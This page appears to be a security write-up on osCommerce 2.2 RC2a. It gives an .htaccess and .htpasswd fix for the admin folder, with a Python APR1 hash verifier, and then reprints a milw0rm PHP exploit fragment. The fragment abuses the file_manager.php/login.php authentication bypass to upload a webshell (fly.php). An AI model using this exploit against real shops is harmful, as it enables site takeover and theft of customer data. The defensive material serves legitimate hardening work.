Fix
If you are using osCommerce 2.2 RC2a, which comes with many web hosting packages by default, one way to protect a default installation from being hacked is to add these lines to the .htaccess file:
AuthName "Restricted Area"
AuthType Basic
AuthUserFile /home/yourusername/oscommerce-folder/admin/.htpasswd
AuthGroupFile /dev/null
require valid-user
and create the .htpasswd file at that path with your admin username and password, for example this line:
admin:$apr1$gVSQE/..$/Gn7sCLhfb7xsz1Zo1xlv1
(Note: the password encoded in the line above is 1234; do not use it as your password.)
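To see what that .htpasswd line encodes, here is an added Python implementation (not code from this page or from osCommerce) of the Apache $apr1$ MD5 scheme that htpasswd -m writes, with a verifier for existing lines and a generator for new ones; the entry checked in its main block is the one from the page, and the user name "admin" is an assumption.

```python
import hashlib
import secrets

# Alphabet used by Apache's to64() when emitting $apr1$ hashes.
_ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _to64(value: int, n: int) -> str:
    return "".join(_ITOA64[(value >> (6 * k)) & 0x3F] for k in range(n))

def apr1_hash(password: str, salt: str) -> str:
    """Return '$apr1$<salt>$<22 chars>' in the format htpasswd -m writes."""
    pw, sb = password.encode(), salt.encode()[:8]  # APR keeps at most 8 salt chars
    ctx = hashlib.md5(pw + b"$apr1$" + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for pl in range(len(pw), 0, -16):        # mix in len(pw) bytes of the alternate digest
        ctx.update(alt[:min(pl, 16)])
    i = len(pw)
    while i:                                 # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                    # 1000 stretching rounds, as in apr_md5_encode()
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(sb)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    return "$apr1$" + sb.decode() + "$" + enc + _to64(final[11], 2)

def verify(password: str, line: str) -> bool:
    """Check a password against an htpasswd line of the form user:$apr1$salt$hash."""
    parts = line.split(":", 1)[-1].split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        return False                         # not an APR1 entry (e.g. {SHA} or bcrypt)
    return secrets.compare_digest(apr1_hash(password, parts[2]), "$".join(parts))

def htpasswd_line(user: str, password: str) -> str:
    """Build a fresh 'user:$apr1$...' line with a random 8-character salt."""
    salt = "".join(secrets.choice(_ITOA64) for _ in range(8))
    return f"{user}:{apr1_hash(password, salt)}"

if __name__ == "__main__":
    # Entry copied from the page; the note there says its password is 1234.
    print(verify("1234", "admin:$apr1$gVSQE/..$/Gn7sCLhfb7xsz1Zo1xlv1"))
    print(htpasswd_line("admin", "use-a-long-unique-passphrase"))
```

APR1 is only 1000 MD5 rounds, so a four-digit password is recovered in seconds from a leaked .htpasswd; use a long passphrase and, on Apache 2.4, prefer `htpasswd -B` (bcrypt). Keep the AuthUserFile outside the web root where possible so it cannot be fetched over HTTP.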
Exploit
Code from milw0rm:
<?php
// $host, $path, $admin_path and $shellcode are not defined in the fragment
// shown on this page; the original milw0rm exploit sets them elsewhere.
// Note the request path: login.php is appended after file_manager.php.
$message  = "POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Encoding: gzip, deflate\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($shellcode)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $shellcode;
$fd = fsockopen($host, '80');
if (!$fd) {
    echo '[~]No response from '.$host;
    die;
}
fputs($fd, $message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
# milw0rm.com [2009-08-31]